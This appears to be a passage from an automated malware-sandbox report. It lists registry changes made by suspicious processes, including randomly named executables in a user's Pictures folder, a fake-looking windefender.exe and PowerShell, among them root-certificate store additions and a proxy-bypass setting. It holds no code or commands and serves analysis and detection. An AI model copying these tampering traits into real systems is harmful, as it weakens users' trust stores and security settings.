| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-362 = "GTB Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2162 = "Altai Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-542 = "Myanmar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\Pictures\GNL8HPgpc3h1ughp9OmayOAG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000b3a38ce0bd68da01661a67a3cd68da0170e5dda10873da0114000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "5" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 820074001c004346534616003100000000005a589971120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe5a5899716a5852832e000000a8e101000000010000000000000000000000000000001a54ab004100700070004400610074006100000042000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 50003100000000006a58b78310004c6f63616c003c0009000400efbe5a5899716a58b7832e000000bbe101000000010000000000000000000000000000001ebd1d014c006f00630061006c00000014000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006a5887831000424142592d437e310000460009000400efbe6a5886836a5887832e0000000eda01000000070000000000000000000000000000009e132a0142004100420059002d0043006c006f0063006b00000018000000 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\tJ6HSphWPkDhrW4fuBx7FKRM.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7